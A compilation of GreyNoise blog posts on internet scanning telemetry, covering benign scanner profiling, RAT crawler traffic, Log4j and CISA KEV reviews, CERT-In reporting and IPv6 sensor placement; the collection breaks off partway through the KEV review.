Insights

Blog posts in the Insights category.

Checking It Twice: Profiling Benign Internet Scanners — 2024 Edition

This is a follow-up from our October, 2022 post — Sensors and Benign Scanner Activity

Throughout the year, GreyNoise tends to focus quite a bit on the “naughty” connections coming our way. After all, that’s how we classify IP addresses as malicious so organizations can perform incident triage at light speed, avoid alert fatigue, and get a leg up on opportunistic attackers by using our IP-based block-lists.

At this time of year, we usually take some time to don our Santa hats and review the activities of the “nice” (a.k.a., “benign”) sources that make contact with our fleet.

Scanning the entire internet now drives both cybersecurity attack strategies and defense tactics. Every day, multiple legitimate organizations perform mass scanning of IPv4 space to gather data about exposed services, vulnerabilities, and general internet health. In November 2024, we deployed 24 new GreyNoise sensors across diverse network locations to study the behavior and patterns of these benign scanners.

Why This Matters

When organizations deploy new internet-facing assets, they typically experience a flood of inbound connection attempts within minutes. While many security teams focus on malicious actors, understanding benign scanning activity is equally crucial for several reasons:

  1. These scans generate significant amounts of log data that can obscure actual threats
  2. Security teams waste valuable time investigating legitimate scanning activity
  3. Benign scanners often discover and report vulnerable systems before malicious actors

The Experiment

We positioned 24 freshly baked sensors across five separate autonomous systems and eight distinct geographies and began collecting data on connection attempts from known benign scanning services. We narrowed the focus down to the top ten actors with the most tags in November. The analyzed services included major players in the internet scanning space, such as Shodan, Censys, and BinaryEdge, along with newer entrants like CriminalIP and Alpha Strike Labs.

Today, we’ll examine these services' scanning patterns, protocols, and behaviors when they encounter new internet-facing assets. Understanding these patterns helps security teams better differentiate between routine internet background noise and potentially malicious reconnaissance activity. There’s a “Methodology” section at the tail end of this post if you want the gory details of how the sausage was made.

The Results

We’ll first take a look at the fleet size of the in-scope benign scanners.

The chart below plots the number of observed IP addresses from each organization for the entire month of November vs. the total tagged interactions from those sources (as explained in the Methodology section). Take note of the tiny presence of both Academy for Internet Research and BLEXBot, as you won’t see them again in any chart. While they made the cut for the month, they also made no effort to scan the sensors used in this study.

As we’ll see, scanner fleet size does not necessarily guarantee nimbleness or completeness when it comes to surveying services on the internet.

Contact Has Been Made

The internet scanner/attack surface management (ASM) space is pretty competitive. One area where speed makes a difference is how quickly new nodes are added to the various inventories. All benign scanners save for ONYPHE (~9 minutes) and CriminalIP (~17 minutes) hit at least one of the target sensors within five minutes of the sensor coming online.

BinaryEdge and ONYPHE display similar dense clustering patterns, with significant activity bursts occurring around the 1-week mark. Their sensor networks appear to capture a high volume of unique IP contacts, forming distinctive cone-shaped distributions that suggest systematic scanning behavior.

Censys and Bitsight exhibit comparable behavioral patterns, though Bitsight’s first contacts appear more concentrated in recent timeframes. This could indicate a more aggressive or efficient scanning methodology for discovering new hosts.

ShadowServer shows a more dispersed pattern of first contacts, with clusters forming across multiple time intervals rather than concentrated bursts. This suggests a different approach to host discovery, possibly employing more selective or targeted scanning strategies.

Alpha Strike Labs and Shodan.io demonstrate sparser contact patterns, indicating either more selective scanning criteria or potentially smaller sensor networks. Their distributions show periodic clusters rather than continuous streams of new contacts.

CriminalIP presents the most minimal contact pattern, with occasional first contacts spread across the timeline. This could reflect a highly selective approach to host identification or a more focused scanning methodology.

The above graph also shows just how extensive some of the scanner fleets are (each dot is a single IP address making contact with one of the sensors; dot colors distinguish one sensor node from another).

If we take all that distinct data and whittle it down to count which benign scanners hit the most sensors first, we see that ONYPHE is the clear winner, followed by Censys — demonstrating strong but more focused scanning capabilities — with BinaryEdge coming in third.

The chart below digs a bit deeper into the first contact scenarios. We identified the very first contacts to each of the 24 sensor nodes from each benign scanner. ONYPHE shows a concentrated burst of activity in the 6-12 hour window, while Bitsight’s contacts are more evenly distributed throughout the observation period. Censys demonstrates a mixed pattern, with clusters in the early hours followed by sporadic contacts. ShadowServer exhibits a notably consistent spread of first contacts across multiple time windows.

BinaryEdge’s pattern suggests coordinated scanning activity, with tight groupings of contacts that could indicate automated discovery processes. Alpha Strike Labs shows a selective, possibly more targeted approach to first contact, while CriminalIP has minimal but distinct touchpoints. Shodan rounds out the observation set with periodic contacts that suggest a methodical scanning approach.

Speed Versus Reach

While speed is a critical competitive edge, coverage may be an even more important one. It’s fine to be the first to discover, but if you’re not making a comprehensive inventory, are you even scanning?

We counted up all the ports these benign scanners probed over the course of a week. Censys leads the pack with an impressive 36,056 ports scanned, followed by ShadowServer scanning 19,166 ports, and Alpha Strike Labs covering 14,876 ports.

ONYPHE, Shodan, and even both BinaryEdge and Bitsight seem to take similar approaches when it comes to probing for services on midrange and higher ports. All of them, save for CriminalIP, definitely know when you’ve been naughty and tried to hide some service outside traditional port ranges.

Before moving on to our last section, it is important to remind readers that we are only showing a 7-day view of activity. Some scanners, notably Censys, have much broader port coverage than a mere 55% of port space. The internet is a very tough environment to perform measurements in. Routes break, cables are cut, and even one small connection hiccup could mean a missed port hit. Plus, it’s not very nice to rapidly clobber a remote node that one is not responsible for.

Tag Time

The vast majority of benign contacts have no real payloads. Some of them do make checks for specific services or for the presence of certain weaknesses. When they do, the GreyNoise Global Observation Grid records a tag for that event. We wanted to see just how many tags these benign scanners sling our way.

Given ShadowServer’s mission, it makes sense that they’d be looking for far more weaknesses than the other benign scanners. The benign scanner organizations that also have an attack surface management (ASM) practice will also usually perform targeted secondary scans for customers who have signed up for such inspections.

In Conclusion

We hope folks enjoyed this second look at what benign scanners are up to and what their strategies seem to be when it comes to measuring the state of the internet.

If you have specific questions about the data or would like to see different views, please do not hesitate to contact us in our community Slack or via email at research@greynoise.io.

Methodology

Sensors were deployed between 2024-11-19 and 2024-11-26 (UTC) across five autonomous systems and in the IP space of the following countries:

  • Croatia
  • Estonia
  • Ghana
  • Kenya
  • Luxembourg
  • Norway
  • Slovenia
  • South Africa
  • Sweden

The in-scope benign actors (based on total tag hits across all of November):

Both Palo Alto’s Cortex Expanse and ByteSpider were in the original top ten, but were removed as candidates. Each of those services are prolific/noisy (one might even say “rude”), would have skewed the results, and made it impossible to compare the performance of these more traditional scanners. Furthermore, while ByteSpider may be (arguably) benign, it has more of a web crawling mission that differs from the intents of the services on the rest of the actor list.

We measured the inbound traffic from the in-scope benign actors for a 7-day period.

Unfortunately, neither Academy for Internet Research and BLEXBot reached out and touched these 24 new sensor nodes, therefore have no presence in the results.

Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.

How to know if I am being targeted

One of the most valuable attributes of GreyNoise is the ability to increase Security Operations Center efficiency by providing context, which allows the relevant security personnel to prioritize alerts. We listen and collect data from around the world from IP addresses that are opportunistically scanning the internet. We intentionally do not solicit traffic and rotate the IPs our services listen on frequently to preserve one of the most important attributes of the GreyNoise dataset: All traffic we observe is unsolicited in nature.

This attribute of our dataset allows us to quickly provide contextual information to answer the question, “Is my organization the victim of a targeted attack?”

On the left is the IP traffic GreyNoise can observe. On the right is the IP traffic a given organization may observe. Where these two groups overlap is the traffic seen by both GreyNoise and your organization. Unfortunately, this means that targeted network requests to your organization may frequently be outside of what GreyNoise can see.

If your organization observes traffic from an IP that has not been observed by GreyNoise, this traffic is likely targeted at your organization due to business verticals, software vendors in use, or implied value. Alerts falling into this category deserve a higher priority for investigation.

The largest volume of traffic targeted at your organization will likely be sourced from your desired user base or from automated tooling specific to your organization’s needs, such as API calls. As this is a near-constant occurrence, your security and infrastructure team are best equipped to recognize and identify what qualifies as normal.

Of course, there is also malicious network traffic targeted at your organization that GreyNoise may not have observed. Despite it being targeted, GreyNoise can still help provide context.

Consider that your organization has observed HTTPS traffic to the path “/v2.57/version” from an IP that GreyNoise has not observed. The GreyNoise Query Language (GNQL) supports wildcards, meaning that values and attributes of network requests that are specific to your organization, such as version differences in software, can be omitted in order to return query results that preserve the overall structure of the request.

Example: raw_data.web.paths:"/v*/version"

This allows you to surface IPs and context that GreyNoise has observed that share structural similarities with traffic observed by your organization that GreyNoise has not observed.

While this type of context association is fuzzy in nature, we can still quickly ascertain that the traffic observed by your organization is likely to be targeting web-accessible containerization software.

Since the traffic observed by your organization was HTTPS, you can further combine and pivot stricter fingerprints such as JA3 hashes to rapidly create actionable documentation for investigations of targeted network traffic.

Spotlight vs lighthouse: crawling versus beaconing in Remote Access Trojans (RATs)

RAT nightmares in the SOC

If you’ve worked in a SOC, you might know this scene:

You clock into work, open the SIEM, and see RAT alerts. Hundreds of them.

Scary, right? Until one of your coworkers goes, “Oh, the RAT alerts. Yeah, just close those out; those are all false positives.”

But how can you be sure?

Actually, you cannot be sure - or, not right away. First, it is crucial to look into how the RATs - Remote Access Trojans - are communicating with each other and their command and control servers.

What’s the difference between beaconing and crawling?

Remote Access Trojans (viruses used to establish persistent remote access to computers) are typically found using beacons. As you can imagine, there are many methods for beaconing multiplied across as many ports and protocols. In a single day, you might see a RAT “beaconing” via IRC, random UDP packets sent to a command and control server, feeding directly into a Discord bot, or even sending requests via Gopher protocol.

The broadest definition of beaconing is when a RAT communicates to its Command and Control (C2) server. This often appears as if the machine itself is communicating with the RAT C2.

Crawling

Crawling, broadly defined, is a server scanning known IP addresses for machines that have installed RATs. Before communicating with a command and control server, the operator will need to see which machines are infected and have communication open. For that purpose: they may crawl the internet, sending a message to every machine and network that might have been infected, hoping for a response from the RAT itself.

Beaconing

We will often observe beaconing and crawling for the same malware, with the beacon and crawl playing a game of call-and-response between the infected machine and a command and control server.

Beaconing can be hard to verify. Sometimes we have observed unique packets on a seemingly random UDP port, only to find out telemetry is being sent by a legitimate program. Crawling, on the other hand, can be easier to find. Typically a crawler tries to send a set payload in order to get a response from the RAT

This article focuses on what we can do with crawling activity.

As an example, search for the tag “gh0st RAT crawler.” https://viz.greynoise.io/query/tags:%22Gh0st%20RAT%20Crawler%22

On this page, many results appear (with mixed reputations). Some of them are from other security companies doing routine scanning for gh0st RAT traffic to monitor the spread of the RAT. However, others are from anonymous servers and may be malicious.

These detections are from a tag GreyNoise has written based on a common hex-encoded header that the crawler sends when checking for gh0st RAT-infected machines.

I found crawler traffic on my network. What should I do?

Using the example of gh0st RAT crawler traffic, there are a few things you may want to consider.

One consideration is the kinds of devices being scanned: gh0st RAT is typically found on Windows machines. Is the crawler coming from a benign source and hitting a Linux server? Perhaps don’t worry about that.

Another factor is where in the network your machine is positioned. It is common for edge devices (web servers and firewalls are two examples) to be constantly scanned at all times by any number of devices for any number of reasons. Is the crawling excessive? You may want to check the source of the crawler to verify if it is a legitimate source. If not, it doesn’t hurt to block them at the firewall.

Finally, are your machines responding? If so, you may want to review your network for signs of compromise. Take stock of any outbound traffic your machine is sending in response to the crawler. If you see that your machine is already ignoring the crawler, you may want to run a quick antivirus scan for peace of mind and carry on. If you’re seeing unfamiliar responses or traffic that’s not usual for your network: perhaps run a thorough antivirus scan, disable RDP on the machine in question, and block the IP address trying to contact you. You may also want to conduct an internal investigation to make sure no data has been exfiltrated if you’re sure that there was a successful connection between your machine and the server trying to communicate with it.

This is where GreyNoise can help your process: by integrating GreyNoise into your environment, you can look for this crawling traffic and determine the reputation of whoever is doing the crawling, taking some of the leg work out of your investigation and response. When minutes count, even saving a few clicks can help.

Practical takeaways from CISA's Cyber Safety Review Board Log4j Report

Practical takeaways from CISA's Cyber Safety Review Board Log4j report

The Cybersecurity and Infrastructure Security Agency (CISA)'s Cyber Safety Review Board (CSRB) was established in May 2021 and is charged with reviewing major cybersecurity incidents and issuing guidance and recommendations where necessary. GreyNoise is cited as a primary source of ground truth in the CSRB's first report (direct PDF), published on July 11, 2022, covering the December 2021 Log4j event. GreyNoise employees testified to the Cyber Safety Review Board on our early observations of Log4j. In this post, we'll examine key takeaways from the report with a GreyNoise lens and discuss what present-day Log4j malicious activity may portend.

Log4J retrospective

It may seem as if it's been a few years since the Log4j event ruined vacations and caused quite a stir across the internet. In reality, it's been just a little over six months since we published our "Log4j Analysis - What To Do Before The Next Big One" review of this mega-incident. Since that time, we've worked with the CSRB and provided our analyses and summaries of pertinent telemetry to help them craft their findings.

The most perspicacious paragraph in the CSRB's report may be this one:

Most importantly, however, the Log4j event is not over. The Board assesses that Log4j is an “endemic vulnerability” and that vulnerable instances of Log4j will remain in systems for many years to come, perhaps a decade or longer. Significant risk remains.

In fact, it reinforces their primary recommendation: "Organizations should be prepared to address Log4j vulnerabilities for years to come and continue to report (and escalate) observations of Log4j exploitation." (CSRB Log4j Report, pg. 6)

The CSRB further recommends (CSRB Log4j Report, pg. 7) that organizations:

  • develop strong configuration, asset, and vulnerability management practices
  • invest resources in the open-source ecosystems they depend upon
  • follow the lead of the Federal government and require and use Software Bill of Materials (SBOM) when sourcing software and components

This is all sound advice, but if your organization is starting from ground zero in any of those bullets, getting to a maturity level where they will each be effective will take time. Meanwhile, we've published three blogs on emerging, active exploit campaigns since the Log4j event:

Furthermore, CISA has added over 460 new Known Exploited Vulnerabilities (KEV) to their ever-growing catalog. That's quite a jump in the known attack surface, especially if you're still struggling to know if you have any of the entries in the KEV catalog in your environment.

While you're working on honing your internal asset, vulnerability, and software inventory telemetry, you can improve your ability to defend from emerging attacks by keeping an eye on attacker activity (something our tools and APIs are superb at), and ensuring your incident responders and analysts identify, block, or contain exploit attempts as quickly as possible. That's one area the CSRB took a light touch on in their report, but that we think is a crucial component of your safety and resilience practices.

Log4j today

Log4j is (sadly, unsurprisingly) alive and well:

This hourly view over the past two months shows regular, and often large amounts of activity by a handful (~50) of internet sources. In essence, Log4j has definitely become one of the many permanent and persistent components of internet "noise," and this is a further confirmation of CISA's posit that Log4j is here for the long haul. As if on queue, news broke of Iranian state-sponsored attackers using the Log4j exploit in very recent campaigns, just as we were preparing this post for publication.

If we take a look at what other activity is present from those source nodes, we make an interesting discovery:

While most of the nodes are only targeting the Log4j vulnerability, some are involved in SSH exploitation, hunting for nodes to add to the ever-expanding Mirai botnet clusters, or focusing on a more recent Atlassian vulnerability from this year.

However, one node has merely added Log4j to the inventory of exploits it has been using. It's not necessary to see all the tag names here, but you can explore these IPs in-depth at your convenience.

Building on the conclusion of the previous section, you can safely block all IPs associated with the Apache Log4j RCE Exploit Attempt tag or other emerging tags to give you and your operations teams breathing room to patch.

You are always welcome to use the GreyNoise product to help you separate internet noise from threats as an unauthenticated user on our site. For additional functionality and IP search capacity, create your own GreyNoise Community (free) account today.

Comply with CERT-In's new reporting requirements by cutting irrelevant alerts

TL;DR 

  • Indian Computer Emergency Response Team (CERT-In) issued sweeping new directions to sub-section (6) of section 70B of the Information Technology Act, 2000.
  • Mandates include reporting of ANY cyber security incident to CERT-In, including targeted scanning of systems, within 6 hours of noticing such incidents.
  • Enforcement deadline is 25-Sep-2022 and applies to virtually all organizations with operations in India.
  • GreyNoise helps customers comply with targeted scanning reporting requirements by allowing them to separate irrelevant "mass scanners" from targeted scanners. 

Ready for updated security incident reporting requirements from CERT-In?

On 28-April-2022, in light of escalating cyber attacks in India, the Indian Computer Emergency Response Team (CERT-In) issued new directions to sub-section (6) of section 70B of the Information Technology Act, 2000. Among other expanded requirements, the new directions mandate reporting of any cyber security incident, including targeted scanning of systems and data breaches, within 6 hours of noticing the incident to CERT-In. Prior to this change, CERT-In had been allowing organizations to report the incidents within “a reasonable time.”

The implications and sweeping nature of the changes caused quite a stir in the security community when initially released, especially since organizations ranging from service providers, intermediaries, data centers, government entities, and corporations, all the way down to small and medium businesses, need to follow CERT-In requirements. 

The directions were to become effective 60 days from the date of issuance in April. However, after receiving a large volume of feedback from affected organizations, CERT-In extended the enforcement deadline to 25-September, 2022. Despite the reprieve on the enforcement deadline, responses to the CERT-In’s standing FAQ indicate that the national agency is not inclined to adjust the main provisions it introduced. 

GreyNoise helps customers identify and respond to opportunistic “scan-and-exploit” attacks in real time. In the case of CERT-In’s new reporting mandate, GreyNoise helps customers filter opportunistic mass-scanning activity out of their alerts, so they can focus (and report on) targeted scanning activity. GreyNoise’s guidance on how to automate the process of detecting and reporting on targeted scanning/probing of critical networks and systems is below.

Section 70B directions scope

At a high level, the new CERT-In directions require organizations to: 

  1. Enable logs of all their Information and Communication Technologies (ICT) systems
  2. Retain logs for 180 days 
  3. Synchronize time with National Informatics Centre’s Network Time Protocol
  4. Define a special point of contact for this activity and share their credentials with CERT-In 
  5. Ensure that Virtual Private Server (VPS) providers, cloud service providers, and Virtual Private Network Service (VPN service) providers maintain accurate information, such as name of the subscriber and IP address for a minimum of five years
  6. Report to CERT-In within 6 hours of any “qualified cybersecurity incidents,” which are summarized in the following excerpt from CERT-In Directions for Section 70B

CERT-In defines “Targeted scanning/probing of critical networks/systems” as: 

The action of gathering information regarding critical computing systems and networks, thus, impacting the confidentiality of the systems. It is used by adversaries to identify available network hosts, services and applications, presence of security devices as well as known vulnerabilities to plan attack strategies.

Not all scans are created equal

These days, every machine connected to the internet is exposed to scans and attacks from hundreds of thousands of unique IP addresses per day. While some of this traffic is from malicious attackers driving automated, internet-wide exploit attacks, a large volume of traffic is benign activity from security researchers, common bots, and business services. And some of it is just unknown. But taken together, this internet noise triggers potentially thousands of events requiring human analysis. Given the expansive wording and stringent timeline of the directions, it’s crucial to intelligently reduce the number of alerts that are in scope and quickly prioritize mass exploit and targeted activity. 

Automate reports of targeted scanning with GreyNoise 

Using GreyNoise, you can effectively identify IP addresses that are connecting to your network and prioritize those that are specifically targeting your organization (versus non-targeted, opportunistic scanning that can be ignored).

In this representative scenario, we have configured our perimeter firewalls to send logs to Splunk. 

Using the GreyNoise App for Splunk (which you can install from Splunkbase), you can configure the gnfilter command to query the IP addresses against GreyNoise API and only return events that GreyNoise has not observed.

Important note - GreyNoise data identifies IP addresses that “mass-scan” the internet - so If GreyNoise has NOT observed an IP address, that means it is potentially “targeted" scanning activity.

For better presentation, the results are deduplicated and stored as a table.

Within Splunk Enterprise, adjust the query to reflect events in the last 6 hours: 

By selecting Search, the query will enrich all the filtered IP addresses against GreyNoise data and return only those IP addresses that have not been observed across our distributed sensor network. 

In our case, the query returned seven IP addresses for which GreyNoise has not seen activity. 

Prioritize this filtered list for additional analysis to rule out targeted scanning on your infrastructure.

To automate this process going forward, save the query as an Alert. You can adjust the Cron Expression to set a query frequency. In this example, it is set to every 6 hours.

Before clicking Save, consider two other helpful actions for configuration: setting a destination email address for the alert, and then formatting the results as a CSV file.

With the alert configured, our query will run every 6 hours to ensure that any IP addresses that should be prioritized for analysis are packaged in a CSV format for review.

Next steps

To learn more about how GreyNoise can help you comply with the updated reporting mandates from CERT-In, reach out to schedule a demo with one of our technical experts.

Your zero-day is just another day

GreyNoise often gets asked, “Do you see zero-day exploits in your dataset?”

If GreyNoise observes an exploit, it means that a non-zero proportion of the internet has observed it simultaneously as well. We often observe widespread exploitation of a vulnerability: either before a CVE is assigned, or before vendors provide any communication. Unfortunately, these exploits often go unnoticed due to a lack of widespread observability, lack of investigation, or lack of communication from vendors telling security teams they should be paying attention to suspicious payloads targeting devices.

GreyNoise (both as a product and platform) serves to increase context and security analyst efficiency so that more time can be spent investigating the aforementioned suspicious payloads. We are also uniquely positioned to provide context to security researchers and software vendors who are in the process of disclosing a new vulnerability.

Zero-day exploits and GreyNoise

When a vendor is made aware of a vulnerability, a common playbook unfolds. First, the relevant information is often kept tightly under wraps until a public communication is released, frequently delayed under the guise of “preventing malicious actors from obtaining useful information and giving customers more time to patch.”  Behind the scenes, the cybersecurity community hopes that the vendor is taking the time to work with various providers to develop detection rulesets and mitigation strategies.

The harsh reality is that “preventing malicious actors from obtaining useful information” and “giving customers time to patch” are mutually exclusive. If a software patch is available to customers, it can be compared to the prior version of the software, often clearly identifying the section of code that malicious actors should target. The false implication of this type of message is that the “exploitation clock” starts when the vendor’s PR team wants it to. 

Vendor PR teams are invited to work together with the GreyNoise Research team early in their investigations. Collaboration allows GreyNoise to share actionable intelligence on whether their yet-to-be-released security bulletin should be given a higher priority because, for example, GreyNoise observed their product being exploited 2 weeks ago.

An Invitation from the GreyNoise Research Team

The GreyNoise Research team explores and classifies network payloads from our vast array of sensors around the world. When a new vulnerability is disclosed, we can quickly determine if the vulnerability has been observed “in the wild” recently as well as historically (since our dataset goes back to 2020). This provides valuable intel for prioritizing vulnerability disclosure.

If you are a vendor or cybersecurity researcher working through a vulnerability disclosure, we encourage you to reach out to the Research team for coordination and actionable intel. In return, we can provide contextualized knowledge to the larger cybersecurity community and a name to label what GreyNoise is already seeing. It’s one of the ways we maximize security analyst efficiency and give fast context to what their teams are investigating.

Find us at research@greynoise.io.

GreyNoise data and the MITRE ATT&CK framework

One of the most frequent customer questions we get is: where can I best apply GreyNoise data? GreyNoise has a trove of data, but when talking about how to actually operationalize our datasets, one of the easiest use cases is through the lens of the MITRE ATT&CK framework.

GreyNoise data + the MITRE ATT&CK framework

The MITRE ATT&CK is a globally accessible knowledge base of adversary tools, tactics, and techniques (TTPs) based on real-world observations. The ATT&CK framework was originally designed to standardize discussion around adversary behavior between public and private sectors. Creating such a framework has allowed organizations to share remediation, mitigation, and detection strategy as it relates to adversary TTPs. Since its inception in 2018, it has become a globally adopted framework for organizations. For further information, check out the MITRE ATT&CK whitepaper

GreyNoise has close to four thousand sensors distributed across the internet passively listening and capturing (good, bad, and unknown) actors conducting scans. Activity observed by these actors can include running large scale nmap or masscan scans indiscriminately searching for devices, looking for exposed services or directories, or going beyond basic discovery and actively searching for vulnerable devices and brute-forcing credentials. Because of the unique data GreyNoise gathers with our extensive sensor network, the two main ATT&CK tactics with which we see customers using GreyNoise data are Reconnaissance (TA0043) and Initial Access (TA0001).

Let’s look at a few examples of specific MITRE ATT&CK techniques and how customers are using GreyNoise to identify attacks better and earlier.

Example 1 - T1595  Active Scanning

Sub-techniques: T1595.001 Active Scanning: Scanning IP Blocks, T1595.002 Active Scanning: Vulnerability Scanning

This is one of our most frequent uses for GreyNoise. By this point, it is well-known that anything put online will be scanned at any time. However, this brings a huge challenge: identifying whether or not something is opportunistic activity, or whether someone is specifically targeting your organization. This hurdle becomes further compounded by the volume of alerts generated on this inbound traffic - volume that can quickly overwhelm even the largest security teams. 

When monitoring these devices and logging the data to a SIEM, one of the quickest ways to filter out noise and start to look at things that are targeted is to compare that data against what GreyNoise has observed. Below, firewall data feeds into Splunk that is being enriched with GreyNoise to better understand what is hitting the firewall. By filtering data this way, teams can see context on most of the IPs to sort them out, quickly find what needs to be investigated, and not spend as much time tracking down IPs that are only opportunistically scanning the internet.

Filtering the data this way quickly sifts opportunistic scan-and-ATT&CK traffic, allowing teams to identify the IP address that should be prioritized for deeper investigation. Better, this yields additional context on the remaining IP addresses for further prioritization. Using GreyNoise data this way facilitates detection of ATT&CKs directed at your organization earlier in the Kill Chain.

Example 2 - TA001  Initial Access

Sub-techniques: T1189 Drive-by Compromise, T1190 Exploit Public-Facing Application

Another popular GreyNoise use case among customers: gaining a better understanding of hosts that are sending exploit payloads across the internet. At the time of this writing, GreyNoise observed almost 85,000 hosts over a 24-hour period who were opportunistically attempting to exploit hosts at scale across the internet.

On closer re-examination of the firewall data (in the data that is enriched by GreyNoise) we can see many IPs and information about the exploits that are being launched.

These are enrichments that easily correlate against vulnerability or ASM data to validate that no one is running vulnerable configurations, allowing teams to quickly close an alert. This can also be used in conjunction with a SOAR tool to verify configurations.

For example, on hosts tagged as brute forcers by GreyNoise, it’s a fast step to see if there was a successful login from that IP. If there is, then panic is justified… but the most likely case is that there is no successful login and the alert can be closed without ever having to alert someone.

Diving in the IPv6 Ocean

The Future of IPv6 at GreyNoise

The GreyNoise research team has reviewed a ton of IPv6 research and reading to provide a roadmap for the future of GreyNoise sensors and data collection. IPv6 is, without a doubt, a growing part of the Internet’s future. Google’s survey shows that adoption rates for IPv6 are on the rise and will continue to grow; the United States government has established an entire program and set dates for migrating all government resources to IPv6; and, most notably, the IPv4 exhaustion apocalypse continues to be an issue. As we approach a bright new future for IPv6, we must also expect IPv6 noise to grow. For GreyNoise, this presents a surprisingly difficult question: where do we listen from? 

According to zMap, actors searching for vulnerable devices can scan all 4.2 billion IPv4 addresses in less than 1 hour. Unlike IPv4 space, IPv6 is unfathomably large, weighing in at approximately 340x1036 addresses. Quick math allows us to estimate 6.523 × 10^24 years to scan all IPv6 space at the same rate as one might use to scan IPv4 space. Sheer size prevents actors from surveying IPv6 space for vulnerabilities in the same way as IPv4. 

But there’s a Hitlist?

Since actors cannot simply traverse the entire address space as they can with IPv4 space, determining where responsive devices might reside in IPv6 space is a difficult and time-consuming endeavor – as demonstrated by the IPv6 Hitlist Project. Projects like the Hitlist are critical as they allow academic researchers to measure the internet and provide context for the environment of IPv6. Without projects like this, we wouldn’t know adoption rates or understand the vastness of the IPv6 space. 

Research scanning is one of the internet’s most important types of noise. It also happens to be the only noise that GreyNoise marks as benign. Unfortunately, researchers aren’t the only ones leveraging things like the Hitlist to survey IPv6 space. Malicious actors also use these “found” responsive IPv6 address databases to hunt vulnerable hosts. To better observe and characterize the landscape of IPv6 noise, GreyNoise must ensure that our sensors end up on things like the IPv6 Hitlist.

One strategy is to place sensors inside of reserved IPv6 space. IPv6 addresses can be up to 39 characters long, proving a challenge to memorize over IPv4’s maximum of 15. The reliance on DNS for devices will become even more prevalent as more organizations adopt IPv6, exposing reverse DNS as a primary method for the enumeration of devices. Following the Nmap ARPA scan logic, adding an octet to an IPv6 prefix and performing a reverse DNS lookup will return one of two results: an NXDOMAIN indicating no entry at the address or NOERROR indicating a reserved host. This method can efficiently reduce the number of hosts scanned in an IPv6 prefix, but does have the prerequisite of knowing the appropriate IPv6 prefix to add octets to check. Since GreyNoise already places sensors in multiple data centers and locations, any database, like the IPv6 Hitlist, will already include us.

Another method is to reside inside of providers that are IPv6-routed. BGP announcements provide a direct route to IPv6 networks, but an enumeration of responsive hosts is still an undertaking. Scanners will need to find a way to catalog and call back to the responsive hosts since there could still be many results (and the size of the address is much larger). Providers with IPv6 routing are growing and affordable, making it worthwhile for us to deploy sensors and work with widely used providers to determine who is already getting scanned using this method.

Our current IPv6 status 

What we currently see in our platform begins with reliable identification of IPv6 in IPv4 encapsulation, often referred to as 6in4. None of our sensors are currently located on providers using solely IPv6; therefore, the packets will always be IPv4 encapsulated. 

We also see users querying for IPv6 addresses in the GreyNoise Visualizer, but these queries are problematic; GreyNoise currently can do better when a user queries for an IPv6 address. Users regularly query for link-local addresses, which are addresses meant for internal network communications. Other queried addresses are often in sets that indicate users are querying IPv6 addresses in their same provider prefix. They may be querying their own IPv6 address or nodes that are attempting neighbor discovery. We are looking at ways to educate and notify users when they input these types of addresses to help them further understand the IPv6 landscape.

The future of IPv6

Though the technicalities of scanning for IPv6 are less straightforward than one would expect, GreyNoise looks to the academic research being done in the IPv6 field to inform future product strategies. As the attack landscape evolves, GreyNoise sensors placed in opportunistic paths will continue to gain and share meaningful IPv6 knowledge for researchers around the world.

Evaluating the CISA KEV

CISA’s Known Exploited Vulnerabilities Catalog: A Performance Review

It’s been over half a year since the U.S. Cybersecurity & Infrastructure Security Agency (CISA) introduced the catalog of Known Exploited Vulnerabilities (KEV) to both Federal agencies and the general public. In this post, we’ll take a clinical look at KEV to see how it has been managed over the past 6+ months, what KEV looks like through a GreyNoise lens, and offer some suggestions for improvements that may help KEV continue to be a useful resource for organizations as they attempt to wade through the annual deluge of CVEs.

CISA KEV: A (Brief) History

In November 2021, CISA launched KEV as part of its mission to support reducing the significant risk of known exploited vulnerabilities outlined in Binding Operational Directive (BOD) 22-01. As CISA puts it: “The KEV catalog sends a clear message to all organizations to prioritize remediation efforts on the subset of vulnerabilities that are causing immediate harm based on adversary activity. Organizations should use the KEV catalog as an input to their vulnerability management prioritization framework.”

CISA recently provided more details around the three points of decision criteria they use to add an item to the KEV catalog. Each entry requires that a vulnerability:

  • has been assigned a Common Vulnerabilities and Exposures (CVE) identifier
  • is under active attempted or successful exploitation(this does not include general scanning, security research, or the mere existence of a proof-of-concept (POC) exploit)
  • has clear remediation guidance that may include applying patches or following official mitigation or workaround guidance

Since the launch, there have been 38 releases (defined as an addition of one or more entries to the catalog in a single day as defined by the <span class="code-block" fs-test-element="rich-text">dateAdded</span> catalog field) for a total of 777 CVEs.

CISA KEV Performance Review

As of June 14, 2022, the National Vulnerability Database handlers have assessed 11,099 new CVEs in calendar year 2022 alone. Sure, many CVEs do not matter to most enterprises, but they still require some type of assessment, even if said assessment is automated away by vulnerability management solutions. Most security teams will gladly accept some help when it comes to prioritization, and a CVE with a sticky note from CISA attached to it saying “THIS IS IMPORTANT,” goes quite a long way, more so than when vendors or pundits all-caps declare that you should PATCH NOW on Twitter.

So, CISA gets a B for providing a small, curated list of what organizations should care about and make operational time for to help ensure the safety and resilience of their workforce, customers/users, and business processes. However, this list is going to keep growing, which reduces overall efficacy over time. I’ll posit some ways CISA can get this up to an A towards the end of this post.

One complaint I’ve had in the past is the KEV release cadence, but I reject my former self’s curmudgeonly assessment because, fundamentally, attackers do not conform to our desired schedules. The initial KEV release was massive (with nearly 300 CVEs), but that’s to be expected since that was the debut of the resource. Each release has happened for a reason. The large volume of ~100 CVEs in March was likely due to those vulnerabilities being exploited by bad actors associated with Russia’s aggression against Ukraine. Some releases with one or two CVEs in them are associated with publicly disclosed bad actors taking advantage of 0-days or recently disclosed flaws in Apple’s iOS or Microsoft’s widely deployed server products.

I’ll give CISA a B-/C+ on this aspect of KEV as it most certainly “needs improvement,” but they are doing the job adequately.

CISA has many seriously old vulnerabilities in the catalog, and they state they use disclosures from “trusted” vendors and other sources for knowledge of the “has been exploited” component of the KEV framework. I’m inclined to trust CISA’s judgment, but not all cyber-folk have such confidence, and — just like your 6th-grade math teacher told you — it’d be great if they showed the work.

For not providing more metadata around each KEV entry, I’ll give CISA a C and provide some ways they can bring that score up as well.

Looking At CISA KEV Through A GreyNoise Lens

Before I get into the advisory section of the post, I thought readers and KEV enthusiasts might want to know if the “Known Exploited” part of KEV was true (i.e., are these CVEs being exploited in the wild?).

